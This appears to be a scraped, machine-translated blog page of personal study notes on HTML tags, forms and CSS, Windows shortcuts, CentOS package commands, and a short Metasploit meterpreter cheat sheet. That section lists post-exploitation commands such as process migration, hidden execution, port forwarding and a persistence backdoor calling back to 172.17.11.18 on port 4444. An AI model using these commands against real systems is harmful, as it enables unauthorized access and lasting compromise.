当前位置:网站首页>Random notes
Random notes
2022-07-06 09:51:00 【XRSec】
Button popup text
<script type="text/javascript"> function a(){ alert(" What's good-looking "); } </script> <input type="button" value= Button popup text onClick="a()">
form In bold <strong>
tilt <em><i>
Delete line <del><s>
Underline <ins><u>
The box <div Occupy a line ><span Span >
Images <img src="" alt="" title=" height="" width="" border=" Border properties ">
Hyperlinks targrt="_blank""_self" <href=""><img src=""> <a href="#two"> Property introduction
Tag attributes <id ="two"> Property introduction
Comment tags <!-- -->
character Space character < < > > & & ¥ ¥ © ® ° ° -+ ± * ×
Tabular label Exhibition / Show data <table> Define the label of the table <thead> <tr> Define table rows <th>……</th>html Header part </tr> <thead> <tbody> <tr> Define table rows <td>……</td> Define cells / Content In bold <td>……</td> Define cells / Content </tr> </tobdy> </table>
left center right border Frame 1 "" There is no border by default Pixel values cellpadding Default 1 Pixels <-> cellspacing Default 2 Pixels >-< width Width height Height merge cell rowspan Cross bank merger Number Uppermost colspan Cross column merge Number Far left
Tabs tab 《 Layout 》 Orderly <ol> <li> </li> <li> </li> </ol>
disorder <ul> <li> </li> <li> <p> </p> </li> </ul>
Custom list <dl> <dt> project </dt> <dd> describe </dd> <dd> </dd> Form labels 《 To collect information 》 Form field <form action="demo.php" url method="post" submission name=" Form field name "> <> The form controls <input type=" Property value " /> Prompt information <></> </form>
Form Elements <input type=" button Define the click button checkbox Define check boxes file The definition file hidden Define hidden input fields image Define the image form submission button password Define password fields radio Define radio buttons <name> reset Define the button from submit Define submit button text Define the input fields for a single line , Default 20 character ">
Form element properties name Definition input Name of element value Regulations input The value of the element Prompt information checked checked="checked" It is stipulated that input The element is selected for the first load maxlength Maximum length
<label> input Element definition annotation ( label ) Binding form elements Increase the size of the selection space <input type="radio" name="sex" id="nan"/><label for="nan"> male </label> <input type="radio" name="sex" id="nv"/><label for="nv"> Woman </label> <from> choice : <select> <option selected="selected" value="">1</option>} <option value="">2</option> <option value=""></option> </select> </from>
The form controls 《 Form Elements 》
<form> <textarea name=""cols=" The number of characters per line " rows=" Number of lines displayed "> According to the content </textarea> </form> ``` ********************************************************** CSS Style sheets ``` <style type="text/css" media="screen"> p { color: red; /* Modify the text pixel size */ font-size: 12px; } </style> ``` typeface ``` font -weight: The font size font-size: font size background-color: The background color color: The font color font-style: Font style ``` Text ``` text-align: Text alignment engxius text-indent: Indent text text-decoration: Text modification , Underline line-height: Row height ``` css Embedded tables ``` <style></style> Profits can be put anywhere Inline style sheets <p style{"color:red"}> Control the current style </p> External style sheets <link rel="stylesheet" herf=""> Split line <input type="text"><button> ```
Selectors
Elements p span
class #id
attribute img
Pseudo class selector a:hover
typeface
font -weight: The font size
font-size: font size
background-color: The background color
color: The font color
font-style: Font style
Text
text-align: Text alignment engxius
text-indent: Indent text
text-decoration: Text modification , Underline
line-height: Row height
Selectors
Descendant selector
Pseudo class selector
Child selectors ```
win Shortcut key
network adapter ncpa.cpl
The notebook notepad
Remote desktop mstsc
View login query user
** Send a message ** msg user message
The registry regedit
Kali
meterpreter
background # Hang up sessions -l sessions -i number
Process migration
migrate Process number
getwd
Check the working directory
uoload
Upload files to the target host == scp Double slash escape
download
Download the target host file to the local
edit
Edit the file
search
search -d Lu Jin -f *.name
portfwd
Port forwarding
portfwd add -l Receive port -p Forward port -r Listening address
rdesktop -u user -p pwd ip Remote desktop
route
View routing table
getuid
View the user of the injection target host process
sysinfo
system information
ps
View process information
migrate
Migration process
execute
Run the program
execute -H -f xxx.exe The graphical interface is hidden
run persistence -X( Boot from boot ) -l( Time interval between ) 5 -p 4444 -r 172.17.11.18
centos
yum install httpd mysql mysql-server mysql-libs mysql-server -y sudo rpm -Uvh http://dev.mysql.com/get/mysql-community-release-el7-5.noarch.rpm yum clean all yum makecache
边栏推荐
- CAP理论
- Research and implementation of hospital management inpatient system based on b/s (attached: source code paper SQL file)
- Mapreduce实例(十):ChainMapReduce
- MapReduce instance (IV): natural sorting
- 面渣逆袭:Redis连环五十二问,图文详解,这下面试稳了
- Function description of shell command parser
- Scoped in webrtc_ refptr
- Listen to my advice and learn according to this embedded curriculum content and curriculum system
- 51单片机进修的一些感悟
- 018.有效的回文
猜你喜欢
Interview shock 62: what are the precautions for group by?
Use of activiti7 workflow
Selection of software load balancing and hardware load balancing
Mapreduce实例(六):倒排索引
How can I take a shortcut to learn C language in college
MapReduce instance (IV): natural sorting
Why can't TN-C use 2p circuit breaker?
Summary of May training - from a Guang
Full stack development of quartz distributed timed task scheduling cluster
Popularization of security knowledge - twelve moves to protect mobile phones from network attacks
随机推荐
Hero League rotation map automatic rotation
Some thoughts on the study of 51 single chip microcomputer
Redis distributed lock implementation redison 15 questions
Global and Chinese markets for hardware based encryption 2022-2028: Research Report on technology, participants, trends, market size and share
Listen to my advice and learn according to this embedded curriculum content and curriculum system
MapReduce instance (x): chainmapreduce
Can I learn PLC at the age of 33
Why is 51+ assembly in college SCM class? Why not come directly to STM32
零基础学习单片机切记这四点要求,少走弯路
Leetcode:608 树节点
Solve the problem of too many small files
Nc29 search in two-dimensional array
大学C语言入门到底怎么学才可以走捷径
发生OOM了,你知道是什么原因吗,又该怎么解决呢?
Compilation of libwebsocket
Release of the sample chapter of "uncover the secrets of asp.net core 6 framework" [200 pages /5 chapters]
068. Find the insertion position -- binary search
五月刷题03——排序
英雄联盟轮播图手动轮播
Regular expressions are actually very simple